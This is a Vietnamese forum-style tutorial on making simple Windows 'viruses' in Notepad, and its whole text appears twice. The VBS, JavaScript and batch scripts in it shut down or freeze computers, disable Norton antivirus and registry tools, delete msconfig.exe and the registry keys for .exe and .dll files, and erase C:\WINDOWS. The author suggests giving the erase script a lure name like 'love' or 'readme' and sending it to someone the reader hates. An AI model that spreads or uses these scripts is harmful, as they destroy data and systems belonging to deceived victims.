Đầu tiên các bạn mở notepad và chọn một trong những đoạn mã sau, các bạn copy đoạn mã vào notepad và lưu dưới đuôi VBS(nếu ko dc thì lưu với đuôi . cmd). ví dụ: slm.vbs chảng hạn..
* mở ra một thông điệp vui sau đó sẽ tắt máy tính
CODE
Code:
@echo off
msg * em la slm ,bb anh!
shutdown -c "virus slm" -s -t 10
Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi:
Dưới đây là code của một số con virus nhỏ dưới dạng VBS:
1.Không cho victim khởi động máy:
Code:
Code:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
2. Disable NAV:
Code:
Code:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"
3. Hiển thị một message mỗi khi reboot máy:
Code:
Code:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win
Logon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Hi ! Toi la SLM"
4. Hiển thị một dòng lệnh khi click vào file hay folder:,
Code:
Code:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK "
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK \","SLM"
5. Làm cho các trò trên hoạt động bình thường:
Code:
Code:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\. Default\Software\Microsoft\Windows\CurrentVersion\
"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Dưới dạng Javascipt :
Code:
Code:
var wsh;
wsh=new ActiveXObject ("Wscript.shell");
// Winlogon when reboot
var s1 = " HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Hi ! Toi la Love. Toi den tu Chip&Kitty.com") ;
//Disable Registry
var s1 = "HKEY_USERS\\. Default\\Software\\Microsoft\\Windows\\CurrentVers
ion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");
//Delete file Msconfig.exe
Code:
Code:
var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;
//Shutdown windows
//Disable Mouse
wsh.run ("RUNDLL32.EXE mouse,disable");
//Hang up windows
wsh.run ("rundll32 user,disableoemlayer");
Xóa khóa Registry Files
* xóa các tập tin registry key, sau đó lặp lại một tin nhắn
CODE
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO slm chuc anh 1 ngay vui ve.
GOTO MESSAGE
-Endless Notepads
* Điều này sẽ bật lên Notepads bất tận cho đến khi máy tính bị đóng băng và các vụ đụng *
CODE
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-Crazy caps lock
* không ngừng quay caps lock và tắt nhanh chóng liên tục *
CODE
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
--Endless ENter
* Ép enter liên tục
CODE
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
--Endless Backspace
* làm cho phím backspace liên tục bị ép *
CODE
Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
* làm cho ổ đĩa CD liên tục vọt ra *
CODE
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
Tất cả các code trên lưu với đuôi VBS
Còn những cái này lưu dưới dạng slm.bat(đuôi .bat)
Lặp lại n lần chu kỳ mess
Code:
@ECHO off
:Begin
msg * Hi
msg * khoe ko anh ?
msg * em slm ne
msg * buon ngu chua?
msg * tat may ngu thoi ,bb anh
GOTO BEGIN
Auto shutdown
Code:
@echo off
msg * slm yeu anh
shutdown -c “Error! tạm biet anh!” -s
còn cái này thì ác hơn nửa
Start > Run > Notepad
Mở notepad, paste đoạn code
Trích dẫn:erase C:\TEST.txt
vào, lưu lại dưới dạng file .cmd với bất cứ tên nào. Ok bây giờ bạn kích hoạt nó, bạn sẽ thấy trong ổ C:\ sẽ ko còn file test.txt.
Đến đây chắc bạn đã vỡ lẽ ra nhìu điều, và bây giờ là công việc chính --> tạo 1 con virus phá hoại:
Hãy mở Notepad, past đoạn code
Trích dẫn:erase C:\WINDOWS
hoặc C:\LINUS nếu là HDH Linus
lưu lại ở định dạng .cmd với 1 cái tên hấp dẫn nào đó ( anhyeuem, emyeuanh,love,readme......)
Vô cùng cảnh báo bạn đừng kích hoạt nó trong máy tính của ban!!!
Bạn hãy gửi cho người nào mà bạn ghét nhất, khi người đó kích hoạt nó.......oops ,xin hãy vui lòng cài lại máy!!!
Và đó gọi là virus, 1 con virus đơn giản nhưng hậu quả của nó thì không đơn giản chút nào.
Một lần nữa mình mong các bạn coi đây là 1 kinh nghiệm để mà tránh chứ đừng áp dụng nó nhe!!!
P/s: Các bạn có thể tạo 1 file .cmd với cách như trên nhưng với đoạn code
Trích dẫn:ATTRIB +S /F /Q *
Để ẩn toàn bộ các file trong Win, ko ai có thể tiếp cận máy tính của bạn trừ khi thiết lập lại cài đặt.
* mở ra một thông điệp vui sau đó sẽ tắt máy tính
CODE
Code:
@echo off
msg * em la slm ,bb anh!
shutdown -c "virus slm" -s -t 10
Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi:
Dưới đây là code của một số con virus nhỏ dưới dạng VBS:
1.Không cho victim khởi động máy:
Code:
Code:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
2. Disable NAV:
Code:
Code:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"
3. Hiển thị một message mỗi khi reboot máy:
Code:
Code:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win
Logon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "http://allformy.topcities.com"
wsh.RegWrite s1+s3, "Hi ! Toi la SLM"
4. Hiển thị một dòng lệnh khi click vào file hay folder:,
Code:
Code:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK "
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK \","SLM"
5. Làm cho các trò trên hoạt động bình thường:
Code:
Code:
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\. Default\Software\Microsoft\Windows\CurrentVersion\
"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Dưới dạng Javascipt :
Code:
Code:
var wsh;
wsh=new ActiveXObject ("Wscript.shell");
// Winlogon when reboot
var s1 = " HKLM\\Software\\Microsoft\\Windows\\CurrentVersion
\\WinLogon\\";
var s2 = "LegalNoticeCaption";
var s3 = "LegalNoticeText";
wsh.RegWrite (s1+ s2, "http://allformy.topcities.com") ;
wsh.RegWrite (s1+s3, "Hi ! Toi la Love. Toi den tu Chip&Kitty.com") ;
//Disable Registry
var s1 = "HKEY_USERS\\. Default\\Software\\Microsoft\\Windows\\CurrentVers
ion\\";
var s2 = "Policies\\System\\DisableRegistryTools" ;
wsh.RegWrite (s1+s2,0,"REG_DWORD");
//Delete file Msconfig.exe
Code:
Code:
var fso;
fso=new ActiveXObject("Scripting.FileSystemObject");
var fe=fso.getfile("C:\\windows\\msconfig.exe);
fe.delete true;
//Shutdown windows
//Disable Mouse
wsh.run ("RUNDLL32.EXE mouse,disable");
//Hang up windows
wsh.run ("rundll32 user,disableoemlayer");
Xóa khóa Registry Files
* xóa các tập tin registry key, sau đó lặp lại một tin nhắn
CODE
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO slm chuc anh 1 ngay vui ve.
GOTO MESSAGE
-Endless Notepads
* Điều này sẽ bật lên Notepads bất tận cho đến khi máy tính bị đóng băng và các vụ đụng *
CODE
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-Crazy caps lock
* không ngừng quay caps lock và tắt nhanh chóng liên tục *
CODE
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
--Endless ENter
* Ép enter liên tục
CODE
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
--Endless Backspace
* làm cho phím backspace liên tục bị ép *
CODE
Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
* làm cho ổ đĩa CD liên tục vọt ra *
CODE
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
Tất cả các code trên lưu với đuôi VBS
Còn những cái này lưu dưới dạng slm.bat(đuôi .bat)
Lặp lại n lần chu kỳ mess
Code:
@ECHO off
:Begin
msg * Hi
msg * khoe ko anh ?
msg * em slm ne
msg * buon ngu chua?
msg * tat may ngu thoi ,bb anh
GOTO BEGIN
Auto shutdown
Code:
@echo off
msg * slm yeu anh
shutdown -c “Error! tạm biet anh!” -s
còn cái này thì ác hơn nửa
Start > Run > Notepad
Mở notepad, paste đoạn code
Trích dẫn:erase C:\TEST.txt
vào, lưu lại dưới dạng file .cmd với bất cứ tên nào. Ok bây giờ bạn kích hoạt nó, bạn sẽ thấy trong ổ C:\ sẽ ko còn file test.txt.
Đến đây chắc bạn đã vỡ lẽ ra nhìu điều, và bây giờ là công việc chính --> tạo 1 con virus phá hoại:
Hãy mở Notepad, past đoạn code
Trích dẫn:erase C:\WINDOWS
hoặc C:\LINUS nếu là HDH Linus
lưu lại ở định dạng .cmd với 1 cái tên hấp dẫn nào đó ( anhyeuem, emyeuanh,love,readme......)
Vô cùng cảnh báo bạn đừng kích hoạt nó trong máy tính của ban!!!
Bạn hãy gửi cho người nào mà bạn ghét nhất, khi người đó kích hoạt nó.......oops ,xin hãy vui lòng cài lại máy!!!
Và đó gọi là virus, 1 con virus đơn giản nhưng hậu quả của nó thì không đơn giản chút nào.
Một lần nữa mình mong các bạn coi đây là 1 kinh nghiệm để mà tránh chứ đừng áp dụng nó nhe!!!
P/s: Các bạn có thể tạo 1 file .cmd với cách như trên nhưng với đoạn code
Trích dẫn:ATTRIB +S /F /Q *
Để ẩn toàn bộ các file trong Win, ko ai có thể tiếp cận máy tính của bạn trừ khi thiết lập lại cài đặt.